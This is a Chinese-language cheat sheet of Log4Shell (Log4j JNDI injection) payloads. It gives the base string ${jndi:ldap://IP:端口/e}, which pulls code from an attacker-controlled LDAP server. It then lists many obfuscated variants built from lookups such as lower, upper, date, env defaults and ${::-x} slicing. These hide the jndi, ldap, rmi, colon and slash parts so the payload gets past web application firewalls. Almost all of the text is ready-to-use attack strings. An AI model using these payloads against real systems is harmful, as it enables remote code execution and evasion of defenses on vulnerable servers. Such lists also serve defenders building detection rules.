初始payload

1	${jndi:ldap://IP:端口/e}

绕过方式

先罗列一下绕waf且不会影响初始payload的操作

切片

${::字符}

lower

1	${lower:字符串}

date

1	${date:'字符'}

env NaN

1	${env:NaN:-字符}

env HL

1	${env:HL:-字符}

env BARFOO

1	${env:BARFOO:-字符}

upper

1	${upper:字符}

k8s k5

1	${k8s:k5:-字符串}

sd k5

1	${sd:k5:-字符}

nagli

1	${nagli:-字符}

jndi字符串绕过

可以使用下方的绕过payload去替代初始payload中的jndi字符串

切片

1	${::-j}${::-n}${::-d}${::-i}

1	${::-j}ndi

1	${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}

lower

1	${lower:jndi}

1	${lower:${lower:jndi}}

1	${lower:j}${lower:n}${lower:d}i

lower 和upper

1	${lower:j}${upper:n}${lower:d}${upper:i}

date

1	${date:'j'}${date:'n'}${date:'d'}${date:'i'}

env NaN

1	${env:NaN:-j}ndi

env HL

1	${env:HL:-j}ndi

env BARFOO

1	${env:BARFOO:-j}ndi

k8s k5

1	j${k8s:k5:-ND}i

ldap字符串绕过

可以使用下方的绕过payload去替代初始payload中的ldap字符串

切片

1	${::-l}${::-d}${::-a}${::-p}

env NaN

1	${env:NaN:-l}dap

rmi字符串绕过

可以使用下方的绕过payload去替代初始payload中的rmi字符串

切片

1	${::-r}${::-m}${::-i}

lower

1	${lower:rmi}

1	${lower:r}m${lower:i}

env NaN

1	${env:NaN:-r}mi

冒号绕过

可以使用下方的绕过payload去替代初始payload中的冒号

env NaN

1	${env:NaN:-:}

env BARFOO

1	${env:BARFOO:-:}

sd k5

1	${sd:k5:-:}

nagli

1	${nagli:-:}

双斜杠绕过

可以使用下方的绕过payload去替代初始payload中的//

切片

1	${:::::::::-//}

${::-/}/